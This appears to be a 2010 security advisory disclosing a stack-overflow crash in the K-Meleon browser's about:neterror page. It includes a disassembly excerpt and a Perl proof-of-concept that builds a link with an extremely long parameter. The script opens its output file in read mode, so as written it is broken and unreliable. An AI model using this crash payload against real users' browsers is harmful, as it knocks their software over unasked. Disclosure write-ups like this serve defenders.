############################################
K-Meleon for windows about:neterror Stack Overflow DoS
Vendor URL:http://kmeleon.sourceforge.net/
Advisore:http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html
Vendor notified:Yes exploit available: YES
############################################

K-Meleon is an extremely fast, customizable, lightweight web browser
based on the Gecko layout engine developed by Mozilla which is also
used by Firefox. K-Meleon is free, open source software released under
the GNU General Public License and is designed specifically for
Microsoft Windows (Win32) operating systems.

K-Meleon is prone vulnerable to crashing with a very long URL...
Internal web pages like about:neterror does not limit the amount of
chars that a user put in 'c' 'd' params and them if we compose a
malformed url the browser can be chash easy.This issue is exploitable
via web links like <a href="very long url">click here</a> or via
window.location.replace('very long url') or similar vectors.

#################
Versions Tested
#################

I have tested this issue in win xp sp3 and a windows 7 fully pached.

Win XP sp3:
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes )
K-Meleon 1.6.0a4 Vulnerables.(crashes)

windows 7 Ultimate:
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes)
K-Meleon 1.6.0a4 Vulnerables.(crashes)

############
References
############

Discovered: 29-07-2010
vendor notify:31-07-2010
Vendor Response:
Vendor patch:

########################
ASM code stack overflow
########################

ScreenShot => http://2.bp.blogspot.com/_oOk20qcOiUk/TFmDVYmRvHI/AAAAAAAAADM/GMymL2zrnRc/s1600/k-meleon.png

CPU Disasm
Address   Hex dump          Command
0043CB3F      CC            INT3
0043CB40  /$  3D 00100000   CMP EAX,1000
0043CB45  |.  73 0E         JNB SHORT 0043CB55
0043CB47  |.  F7D8          NEG EAX
0043CB49  |.  03C4          ADD EAX,ESP
0043CB4B  |.  83C0 04       ADD EAX,4
0043CB4E  |.  8500          TEST DWORD PTR DS:[EAX],EAX
0043CB50  |.  94            XCHG EAX,ESP
0043CB51  |.  8B00          MOV EAX,DWORD PTR DS:[EAX]
0043CB53  |.  50            PUSH EAX
0043CB54  |.  C3            RETN
0043CB55  |>  51            PUSH ECX
0043CB56  |.  8D4C24 08     LEA ECX,[ARG.1]
0043CB5A  |>  81E9 00100000 /SUB ECX,1000
0043CB60  |.  2D 00100000   |SUB EAX,1000
0043CB65  |.  8501          |TEST DWORD PTR DS:[ECX],EAX <== Stack overflow
0043CB67  |.  3D 00100000   |CMP EAX,1000
0043CB6C  |.^ 73 EC         \JNB SHORT 0043CB5A
0043CB6E  |.  2BC8          SUB ECX,EAX
0043CB70  |.  8BC4          MOV EAX,ESP
0043CB72  |.  8501          TEST DWORD PTR DS:[ECX],EAX
0043CB74  |.  8BE1          MOV ESP,ECX
0043CB76  |.  8B08          MOV ECX,DWORD PTR DS:[EAX]
0043CB78  |.  8B40 04       MOV EAX,DWORD PTR DS:[EAX+4]
0043CB7B  |.  50            PUSH EAX
0043CB7C  \.  C3            RETN
0043CB7D      CC            INT3
0043CB7E      CC            INT3




################
#Proof Of Concept
################

#######################################################################
#!/usr/bin/perl
# k-meleon Long "a href" Link DoS
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
# k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS
# generate the file open it with k-keleon click in the link and wait a seconds
######################################################################

$archivo = $ARGV[0];
if(!defined($archivo))
{

print "Usage: $0 <archivo.html>\n";

}

$cabecera = "<html>" . "\n";
$payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x
1028135 . "\">click here if you can :)</a>" . "\n";
$fin = "</html>";

$datos = $cabecera . $payload . $fin;

open(FILE, '<' . $archivo);
print FILE $datos;
close(FILE);

exit;

################## EOF ######################

##############
Related Links
##############

vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776

###################### €nd #############################

Thnx to Phreak for support and let me undestanding the nature of this bug
thnx to jajoni for test it in windows 7 X64 bits version.

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....